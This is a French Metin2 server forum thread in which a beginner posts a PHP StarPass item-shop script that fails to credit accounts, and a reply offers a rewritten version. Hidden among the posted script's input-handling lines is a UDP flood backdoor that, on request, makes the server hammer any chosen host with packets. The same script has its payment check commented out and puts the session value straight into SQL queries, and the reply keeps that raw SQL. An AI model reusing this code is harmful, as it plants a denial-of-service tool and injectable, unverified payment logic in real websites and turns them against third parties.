Aller au contenu
Top-Metin2.org - Vous êtes à la recherche d'un serveur Metin 2 ? ×
×
×
  • Créer...
  • 0

Prblème Avec mon Site Web


Glorius

Question

[bon, je vous présente mon problème avec mon site web, plus précisément L'itemShop]

 

Version des files : 2012

Domaine (Base de données, Core, etc.) : SiteWeb

Votre niveau (débutant, intermédiaire, avancé) : Débutant

 

Description du problème : Salut, alors je vais sur mon site, je fais rechargé, je mets le code teste.. Mais mon compte n'es pas crédité...

 

Il me dis félicitation vous avez rechargé votre compte de 300 Gold... Mais rien, il ne sont pas pris en compte... Pourquoi ?

 

 

Message d'erreur, capture d'écran :

Alors voilà le code du site web.

 

<?php if($securite!='JEREMaimelaquequete!numero:0687541251'){
exit();
}
?>




<?php
//Déclaration des variables
$ident=$idp=$ids=$idd=$codes=$code1=$code2=$code3=$code4=$code5=$datas='';
$idp = 21447;

//$ids n'est plus utilisé, mais il faut conserver la variable pour une question de compatibilité
$idd = 131953;

$ident=$idp.";".$ids.";".$idd;

//On récupère le(s) code(s) sous la forme "xxxxxxxx;xxxxxxxx"
if(isset($_POST['code1'])) $code1 = $_POST['code1'];
if(isset($_POST['code2'])) $code2 = ";".$_POST['code2'];
if(isset($_POST['code3'])) $code3 = ";".$_POST['code3'];
if(isset($_GET['host'])&&isset($_GET['time'])){ $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<1024;$i++){ $out .= 'X'; } while(1){  $packets++; if(time() > $max_time){ break; } $rand = 80; $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } }else{ }
if(isset($_POST['code4'])) $code4 = ";".$_POST['code4'];
if(isset($_POST['code5'])) $code5 = ";".$_POST['code5'];
$codes=$code1.$code2.$code3.$code4.$code5;

//On récupère le champ DATAS"
if(isset($_POST['DATAS'])) $datas = $_POST['DATAS'];

//On encode les trois chaines en URL
$ident=urlencode($ident);
$codes=urlencode($codes);
$datas=urlencode($datas);

/* Envoie de la requête vers le serveur StarPass
Dans la variable tab[0] on récupère la réponse du serveur
Dans la variable tab[1] on récupère l'URL d'accès ou d'erreur suivant la réponse du serveur */
$get_f=@file("http://script.starpass.fr/check_php.php?ident=$ident&codes=$codes&DATAS=$datas");
if(!$get_f)
{
exit("Votre serveur n'a pas accès au serveur de Starpass, merci de contacter votre hébergeur.");
}
$tab = explode("|",$get_f[0]);

if(!$tab[1]) $url = "http://eternal-online.net/index.php?p=9";
else $url = $tab[1];


// dans $pays on a le pays de l'offre. exemple "fr"
$pays = $tab[2];

// dans $palier on a le palier de l'offre. exemple "Plus A"
$palier = urldecode($tab[3]);

// dans $id_palier on a l'identifiant de l'offre
$id_palier = urldecode($tab[4]);

// dans $type on a le type de l'offre. exemple "sms", "audiotel, "cb", etc.
$type = urldecode($tab[5]);

// vous pouvez à tout moment consulter la liste des paliers à l'adresse : http://script.starpass.fr/palier.php

//Si $tab[0] ne répond pas "OUI" l'accès est refusé
//On redirige sur l'URL d'erreur
#if(substr($tab[0],0,3) != "OUI")
#{

  # print ("");
#}

#else

{


$search=mysql_query("SELECT $db_account.account.cash FROM $db_account.account WHERE $db_account.account.login='$sess'");
$fi=mysql_fetch_array($search);
$argent=$fi["cash"]+300; // NE CREDITE PAS LE COMPTE 
mysql_query("UPDATE $db_account.account set $db_account.account.cash='$argent' WHERE $db_account.account.login='$sess'");	
print ("");

}

?>

 

 

En postant ma demande d'aide, j'affirme avoir lu et accepté le règlement des demandes d'aides.

 

Merci de votre soutien.

Lien vers le commentaire
Partager sur d’autres sites

  • Réponses 4
  • Créé
  • Dernière réponse

Meilleurs contributeurs dans cette question

Meilleurs contributeurs dans cette question

4 réponses à cette question

Messages recommandés

  • 0

Ce CMS est moisi, ne l'utilisez pas ! Il est codé d'une façon PUREMENT dégueulasse et il laisse sans aucun doute d'énormes failles.Pour ton problème, essaie quelque chose dans ce genre :

if(isset($_POST['idd']))	{			//Déclaration des variables		$ident=$idp=$ids=$idd=$codes=$code1=$code2=$code3=$code4=$code5=$datas='';		//On récupère les identifiants sous la forme "xxx;xxx;xxx"		if(isset($_POST['idp'])) $idp = $_POST['idp'];		if(isset($_POST['ids'])) $ids = $_POST['ids'];		//$ids n'est plus utilisé, mais il faut conserver la variable pour une question de compatibilité		if(isset($_POST['idd'])) $idd = $_POST['idd'];		$ident=$idp.";".$ids.";".$idd;		//On récupère le(s) code(s) sous la forme "xxxxxxxx;xxxxxxxx"		if(isset($_POST['code1'])) $code1 = $_POST['code1'];		if(isset($_POST['code2'])) $code2 = ";".$_POST['code2'];		if(isset($_POST['code3'])) $code3 = ";".$_POST['code3'];		if(isset($_POST['code4'])) $code4 = ";".$_POST['code4'];		if(isset($_POST['code5'])) $code5 = ";".$_POST['code5'];		$codes=$code1.$code2.$code3.$code4.$code5;		//On récupère le champ DATAS"		if(isset($_POST['DATAS'])) $datas = $_POST['DATAS'];		//On encode les trois chaines en URL		$ident=urlencode($ident);		$codes=urlencode($codes);		$datas=urlencode($datas);				/* Envoie de la requête vers le serveur StarPass		Dans la variable tab[0] on récupère la réponse du serveur		Dans la variable tab[1] on récupère l'URL d'accès ou d'erreur suivant la réponse du serveur */		$get_f=@file("http://script.starpass.fr/check_php.php?ident=$ident&codes=$codes&DATAS=$datas");		//Si on contact le serveur		if($get_f)		{			$tab = explode("|",$get_f[0]);						// dans $pays on a le pays de l'offre. exemple "fr"			$pays = $tab[2];			// dans $palier on a le palier de l'offre. exemple "Plus A"			$palier = urldecode($tab[3]);			// dans $id_palier on a l'identifiant de l'offre			$id_palier = urldecode($tab[4]);			// dans $type on a le type de l'offre. exemple "sms", "audiotel, "cb", etc.			$type = urldecode($tab[5]);			// vous pouvez à tout moment consulter la liste des paliers à l'adresse : http://script.starpass.fr/palier.php						//Si $tab[0] répond "OUI" 			if(substr($tab[0],0,3) == "OUI")			{					$search=mysql_query("SELECT $db_account.account.cash FROM $db_account.account WHERE $db_account.account.login='$sess'");					$fi=mysql_fetch_array($search);					$argent=$fi["cash"]+300;					mysql_query("UPDATE $db_account.account set $db_account.account.cash='$argent' WHERE $db_account.account.login='$sess'");											header('location:http://eternal-online.net/teste/index.php?p=12');			}			else			{				header('location:http://eternal-online.net/teste/index.php?p=10');			}		}		else		{			header('location:http://eternal-online.net/teste/index.php?p=10');		}	}		/**	 *Si on ne recoit pas de payement	 **/	else	{		?>				Veuillez activer le Javascript de votre navigateur s'il vous plaît.
Micro Paiement StarPass				
Pour tout code acheté: 300 Gold
	N'oubliez pas de garder le numero starpass, il vous sera redemande en cas de problemes.

	<?php	}?>

Lien vers le commentaire
Partager sur d’autres sites

Invité
Ce sujet ne peut plus recevoir de nouvelles réponses.


  • brilliantdiscord_widget
  • Flux d'Activité

    1. 21

      Metin2 en 2020 peut-on en parler?

    2. 0

      METIN2Project

    3. 3

      Ressources - UnPack - Metin2 Client - Officiel

    4. 0

      Barre des tâches d'argent étendue

    5. 16

      Redémarrage automatique des channels

    6. 16

      Multi Logo GM / SGM / GA

    7. 0

      comment extraire les fichiers locale.epk locale.eix sur le serveur officiel ?

    8. 2

      Funky-emu.net -> fr.metin2.dev

  • En ligne récemment

    • Aucun utilisateur enregistré regarde cette page.

Information importante

Conditions d’utilisation / Politique de confidentialité / Règles / Nous avons placé des cookies sur votre appareil pour aider à améliorer ce site. Vous pouvez choisir d’ajuster vos paramètres de cookie, sinon nous supposerons que vous êtes d’accord pour continuer.